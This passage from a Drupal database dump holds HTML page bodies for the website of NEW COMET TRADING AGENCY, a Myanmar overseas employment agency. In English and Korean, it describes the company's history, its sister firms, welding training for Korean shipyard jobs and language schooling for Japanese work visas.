Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 83, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리\"뉴코멧 영업 대행사\" 웹사이트 에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" 